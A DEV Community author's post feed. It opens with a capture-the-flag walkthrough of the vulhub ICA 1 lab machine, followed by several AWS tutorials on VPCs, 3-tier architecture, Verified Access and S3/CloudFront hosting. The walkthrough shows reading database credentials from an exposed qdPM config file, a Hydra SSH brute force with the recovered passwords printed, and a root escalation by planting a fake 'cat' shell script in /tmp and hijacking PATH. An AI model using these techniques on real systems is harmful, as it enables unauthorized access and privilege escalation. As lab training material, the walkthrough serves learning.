DEV Community: D3fender0

vulhub ICA 1 machine walkthrough

D3fender0 — Wed, 16 Apr 2025 17:55:55 +0000

Description

According to information from our intelligence network, ICA is working on a secret project. We need to find out what the project is. Once you have the access information, send them to us. We will place a backdoor to access the system later. You just focus on what the project is. You will probably have to go through several layers of security. The Agency has full confidence that you will successfully complete this mission. Good Luck, Agent!

Difficulty: Easy

Lab setup
First, download the vulnerable machine in ZIP format and extract that.

import the machine

Make sure both the attacker machine and the vulnerable machine are configured to use the same NAT network to allow proper communication between them.

Nmap scan
nmap -sC -sV 10.0.2.4 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) | ssh-hostkey: | 3072 0e:77:d9:cb:f8:05:41:b9:e4:45:71:c1:01:ac:da:93 (RSA) | 256 40:51:93:4b:f8:37:85:fd:a5:f4:d7:27:41:6c:a0:a5 (ECDSA) |_ 256 09:85:60:c5:35:c1:4d:83:76:93:fb:c7:f0:cd:7b:8e (ED25519) 80/tcp open http Apache httpd 2.4.48 ((Debian)) |_http-title: qdPM | Login |_http-server-header: Apache/2.4.48 (Debian) 3306/tcp open mysql MySQL 8.0.26 | ssl-cert: Subject: commonName=MySQL_Server_8.0.26_Auto_Generated_Server_Certificate | Not valid before: 2021-09-25T10:47:29 |_Not valid after: 2031-09-23T10:47:29 |_ssl-date: TLS randomness does not represent time | mysql-info: | Protocol: 10 | Version: 8.0.26 | Thread ID: 14 | Capabilities flags: 65535 | Some Capabilities: Support41Auth, LongColumnFlag, Speaks41ProtocolNew, Speaks41ProtocolOld, FoundRows, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, LongPassword, InteractiveClient, SupportsCompression, ODBCClient, SwitchToSSLAfterHandshake, DontAllowDatabaseTableColumn, ConnectWithDatabase, SupportsTransactions, SupportsLoadDataLocal, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments | Status: Autocommit | Salt: n&"B\x06N\x02.*\x14\x01!cB\x08\x12F>\x1D/ |_ Auth Plugin Name: caching_sha2_password MAC Address: 08:00:27:CB:E5:55 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Upon scanning the vulnerable machine, you’ll notice that the SSH, HTTP, and MySQL ports are open, indicating potential entry points for exploitation.

Directory Enumeration

For directory enumeration, I recommend using the Dirsearch tool. Its simple and easy-to-remember syntax makes it a great choice for beginners and experienced users alike

dirsearch -u 10.0.2.4 [10:02:54] 301 - 306B - /backups -> http://10.0.2.4/backups/ [10:02:54] 200 - 401B - /backups/ [10:02:57] 200 - 0B - /check.php [10:02:59] 301 - 303B - /core -> http://10.0.2.4/core/ [10:02:59] 301 - 302B - /css -> http://10.0.2.4/css/ [10:03:03] 200 - 894B - /favicon.ico [10:03:07] 301 - 305B - /images -> http://10.0.2.4/images/ [10:03:07] 200 - 635B - /images/ [10:03:07] 200 - 2KB - /index.php [10:03:07] 404 - 4KB - /index.php/login/ [10:03:07] 301 - 306B - /install -> http://10.0.2.4/install/ [10:03:08] 200 - 764B - /install/ [10:03:08] 200 - 764B - /install/index.php?upgrade/ [10:03:08] 301 - 309B - /javascript -> http://10.0.2.4/javascript/ [10:03:08] 200 - 573B - /js/ [10:03:12] 301 - 305B - /manual -> http://10.0.2.4/manual/ [10:03:12] 200 - 208B - /manual/index.html [10:03:21] 200 - 338B - /readme.txt [10:03:22] 200 - 26B - /robots.txt [10:03:23] 403 - 273B - /server-status [10:03:23] 403 - 273B - /server-status/ [10:03:27] 301 - 307B - /template -> http://10.0.2.4/template/ [10:03:28] 200 - 483B - /template/ [10:03:29] 301 - 306B - /uploads -> http://10.0.2.4/uploads/ [10:03:29] 200 - 467B - /uploads/

we can see the suspicious url

qdPM is a web-based project management tool, and in this case, we're working with version 9.2, which is known to be vulnerable.
(https://www.exploit-db.com/exploits/50176)

We discovered the database configuration details by accessing the following URL.
http://website/core/config/databases.yml

Let's connect that .
`mysql -u qdpmadmin -p -h 10.0.2.4 --ssl=0

Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 11
Server version: 8.0.26 MySQL Community Server - GPL`

The 'user' table contains a list of usernames. Let's check out the 'login' table, where we can find a list of Base64-encoded passwords. After decoding them, save the results to a password file. Since we know the SSH service is running, we can now use the discovered usernames and passwords to attempt a brute-force attack.

`hydra -L user.txt -P password.txt ssh://10.0.2.4

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-16 01:32:46
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 30 login tries (l:6/p:5), ~2 tries per task
[DATA] attacking ssh://10.0.2.4:22/
[22][ssh] host: 10.0.2.4 login: travis password: DJceVy98W28Y7wLg
[22][ssh] host: 10.0.2.4 login: dexter password: 7ZwV4qtg42cmUXGX
^X1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-04-16 01:32:53 `

We successfully obtained the passwords for the 'travis' and 'dexter' accounts

connect the dexter ssh account.
Next, let's check which files have the SUID (Set User ID) bit set.
find / -type f -perm -04000 -ls 2>/dev/null -rwsr-xr-x 1 root root 16816 Sep 25 2021 /opt/get_access -rwsr-xr-x 1 root root 58416 Feb 7 2020 /usr/bin/chfn -rwsr-xr-x 1 root root 35040 Jul 28 2021 /usr/bin/umount -rwsr-xr-x 1 root root 88304 Feb 7 2020 /usr/bin/gpasswd -rwsr-xr-x 1 root root 182600 Feb 27 2021 /usr/bin/sudo -rwsr-xr-x 1 root root 63960 Feb 7 2020 /usr/bin/passwd -rwsr-xr-x 1 root root 44632 Feb 7 2020 /usr/bin/newgrp -rwsr-xr-x 1 root root 71912 Jul 28 2021 /usr/bin/su -rwsr-xr-x 1 root root 55528 Jul 28 2021 /usr/bin/mount -rwsr-xr-x 1 root root 52880 Feb 7 2020 /usr/bin/chsh -rwsr-xr-x 1 root root 481608 Mar 13 2021 /usr/lib/openssh/ssh-keysign -rwsr-xr-- 1 root messagebus 51336 Feb 21 2021 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
The 'get_access' file is not a regular file, so let's go ahead and execute it to see what happens.

`
dexter@debian:~$ /opt/get_access

############################
######## ICA #######
### ACCESS TO THE SYSTEM ###
############################

Server Information:

Firewall: AIwall v9.5.2
OS: Debian 11 "bullseye"
Network: Local Secure Network 2 (LSN2) v 2.4.1 ` All services are disabled. Accessing to the system is allowed only within working hours.

Let's examine the content of the 'get_access' binary by using the strings command to extract any readable strings.

you can see the there is suspicious binary included.

cat /root/system.info
What does it do? When we run the 'get_access' file, it reads the 'system.info' file with root privileges.

To understand how the cat command works, it’s important to know that the system searches for the cat binary in directories listed in the $PATH variable. However, if we provide a direct path to the cat binary, the system will execute it from that specific location.

Now, let’s craft a malicious cat binary in the /tmp directory and add its location to the beginning of the $PATH environment variable. This way, when the system tries to execute cat, it will run our malicious version instead.

echo -e '#!/bin/bash\n/bin/bash' > /tmp/cat chmod +x /tmp/cat export PATH=/tmp:$PATH
execute the get_access file. we successfully obtained the root access.
root@debian:/root# ls root.txt system.info
I hope you found this blog insightful and enjoyable. Thank you for reading, keep exploring and keep learning!

AWS 101 Workshop

D3fender0 — Thu, 10 Apr 2025 03:05:11 +0000

1) Setup Networking (VPC)

Navigate to the AWS Management Console and locate the VPC service.
Click Create VPC.
Select VPC and more. This will start the VPC wizard.
Create a private and public subnet in 2 Availability Zone Each subnet is connected to a route table, which determines how network traffic is routed. The public subnets are routed to an Internet Gateway
In the NAT gateways section, select 1 per AZ.
Review the Network

2) security group
Browse to the Security Groups part of the Amazon EC2 service.
click Create security group to define a new custom security group for our resource
In the Inbound rules section click Add rule

Load Balancer --> HTTP TCP 80 Anywhere-IPv4 Allow HTTP inbound from Internet
EC2 --> HTTP TCP 80 Load Balancer Security Group Allow HTTP inbound from Load Balancer Tags are metadata labels you can apply to AWS resources for organization and cost tracking. Create a new tag for the security group by clicking Add new tag. Enter Name for Key and LoadBalancerSecurityGroup for Value. Finalize the creation by clicking Create security group.

Load Balancer:

Web Server:

(3) IAM

Browse to the IAM service and click create Role.
Select AWS Service. Choose EC2 for the service or use case.
Select EC2 Role for AWS Systems Manager and click Next
Confirm that the AmazonSSMManagedInstanceCore policy and AmazonS3ReadOnlyAccess Policy has been added to the role and click Next
Name the role. Scroll to the bottom and click Create role

(4) Deploy Compute (EC2)

Browse to the EC2 service.
Click Launch Instance.
Name the server and choose the created VPC, SG, add Role and paste the code then click create.

Upload the User data file:

(5) Administer Web Server (SSM)

In the Amazon EC2 dashboard, select the web server instance. You'll notice it only has a private IP address, not a public one
Select the Session Manager tab in ec2 instance and click Connect.
run the following command in the CLI by connecting the instance to the SSM

(6) Load Balancing (ALB)

Create Load Balancer:

Create Target Group:

(7) Test Web Server

Copy the DNS of the Load Balancer and paste it in a new browser tab

(8) Storage (S3)

Upload the files

AWS 3- tier architecture part-4

D3fender0 — Wed, 09 Apr 2025 17:19:23 +0000

Lets create the instance without key

connect the instance and launch the mysql

Upload the file

AWS 3-Tier Architecture Part-3

D3fender0 — Wed, 09 Apr 2025 17:10:52 +0000

Lets Start with creating subnet group for our database , open RDS and in that open subnet group

Next add the Availability zone and add the private subnet 1 and 2 which is in app tier

Lets create the database,first select standard create and select engine as aurora

Select template as dev/test

select self managed and click aurora standard

Select the Vpc and security group for the db

Now click create database

AWS 3-Tier Architecture Part-2

D3fender0 — Wed, 09 Apr 2025 17:03:31 +0000

First create a Vpc and give 10.0.0.0/16 in ipv4 and create the Vpc

Next create 4 private subnet and 2 public subnet for the aws-3-tier-workshop and create tag if needed as shown below

Now we have completed creating all 6 subnets

Next we have to create internet gateway as shown below

Next we are going to attach the Internet gateway to the vpv as shown below:

Lets now create a NAT gateway for both public subnets

Next we have to create route table

Next we have to edit the route table by adding the internet gateway and save it as below

Now on subnet assoociation and add the 2 public subnet and save it:

Next we have to create 2 route table for 2 nat gateways

Now edit the route table and add the both nat gateway 1 and 2 for both the route table

Next in subnet association connect the first private subnet to first route table and the 2nd private subnet to the second route table

next we have to create 5 Security groups,first lets create security group for internet facing lb ,edit onlt the outbound rules

next lets create security group for web tier , edit only the inbound rules

Next create security group for internal load balancer and in inbound rules connect the security group of web tier

Next we have to create 4th security group for the app-tier we have to connect the security group of internal load balancer and in custom tcp we have to give port 4000

Next lets create the 5th security group connect to the db and the internal load balancer

AWS 3-Tier Architecture Part-1

D3fender0 — Wed, 09 Apr 2025 16:47:29 +0000

Architecture

Now create a S3 bucket to avoid errors us us-east-2 as aws account region with bucket versioning enabled

Next head to dashboard and open Iam to create a new Iam role for S3

Click next and add the following role:

AmazonSSMManagedInstanceCore

AmazonS3ReadOnlyAccess

Next create role name and click create role

Now we have successfully created a role our S3

AWS verified Access services

D3fender0 — Wed, 09 Apr 2025 16:07:36 +0000

What is AWS Verified Access?

AWS Verified Access is a service that lets you securely connect users to your internal web apps—without needing a VPN.

You read that right. No VPN needed. Verified Access uses the Zero Trust model, meaning “trust no one by default.” It verifies the user’s identity and their device posture before granting access.

Why Should Beginners Like Us Care?

As cloud newbies, we usually focus on EC2, S3, Lambda, and VPC (of course). But security is a big deal in cloud computing, and that’s where Verified Access comes in:

No VPN Required: Easy to set up access without old-school network tunnels.
Fine-Grained Access Control: Only let the right people with the right devices access your app.
Integrates with IAM Identity Center.
Improves Visibility: Logs all access attempts to CloudWatch for easy monitoring. So, if you're building internal tools for your dev team, or hosting something sensitive on EC2—Verified Access can lock it down. 🏗️ How Does It Work?

Here’s a simple beginner flow of how it works:

✅ User Tries to Access a private web app.

👤 Verified Access Checks their identity and device.

🔓 If verified, grants access to the app. If not—bye-bye.

how it works

You create a Verified Access instance, attach it to a load balancer (usually an Application Load Balancer), and define the trust providers (like IAM Identity Center ). Pretty neat for a security service!

Prerequisites:

EC2 instance hosting a simple app (e.g., Flask, Node.js, or even a static HTML).

Application Load Balancer.

IAM Identity Center (or create a mock provider for testing).

Steps to Try:

Go to the AWS Console > Verified Access.

Create a Verified Access instance.

Connect your ALB.

Choose your trust provider.

Define access policies using Cedar (AWS's new policy language—super readable!).

Test by accessing your app via the Verified Access endpoint.

📌 My Final Thoughts

As someone new to cloud security, learning about AWS Verified Access was refreshing. It’s a solid option if you're thinking about Zero Trust and want to avoid the hassle of setting up VPNs for internal apps.

If you’re also learning AWS, don’t be afraid to explore the less-popular services. You might find something awesome, just like I did.

Drop a comment, I’d love to hear how you’re handling internal access securely in your projects 👇

Let’s keep learning 💡

Hosting a React App on AWS S3 with CloudFront

D3fender0 — Thu, 23 Jan 2025 19:09:27 +0000

Building the React Project

1.Open the command prompt and navigate to your project directory.

2.Run the following commands to create and set up your React project:

npx create-react-app your-react-app-name
npm create vite@latest 
    1.enter your project name
    2. select react framework
    3. Then choose Typescript
npm install
npm run dev

Once the development server starts, you will see your app running on a local IP address.

You can modify the application code in the src/App.tsx file as needed.

Creating an S3 Bucket

1.Log in to the AWS Management Console.

2.Search for S3 in the search bar and click on it.

3.Click on the Create bucket button.

4.Provide a unique name for your bucket.
Note: The bucket name must be globally unique.

5.Select the ACL disabled option. This ensures that all objects in the bucket are owned by this account.

Disable the Block all public access option.

7.Click Create bucket to finalize the process.

8.Upload your React project files and folders to the bucket.

9.Configuring Static Website Hosting

10.Navigate to the Properties tab of your S3 bucket.

11.Scroll down to the Static website hosting section and click Edit.

12.Enable static website hosting and provide the name of your main file (e.g., index.html).

13.Save the changes.

14.Setting Bucket Permissions

15.Move to the Permissions tab.

16.Generate a new Bucket Policy:
17.Copy your bucket's ARN number.
18.Use the policy generator to create a bucket policy that grants public read access.

Add the generated bucket policy to your bucket.

Modify the Resource field in the policy to include "/*" at the end, ensuring that all files in the bucket are accessible.

Save the changes.

Configuring CloudFront

1.Navigate to the CloudFront service in AWS.

2.Click Create Distribution and choose your S3 bucket in the Origin Domain field.

3.Enable the following settings:
Redirect HTTP to HTTPS.
Set the appropriate caching and security options.

4.Disable the Web Application Firewall (WAF) option if you don’t need it.

Save the changes and wait a few minutes for the CloudFront distribution to deploy.

Once deployed, copy the CloudFront domain URL and open it in a new browser tab.

By following these steps, your React project is successfully hosted on AWS S3 and securely delivered via CloudFront!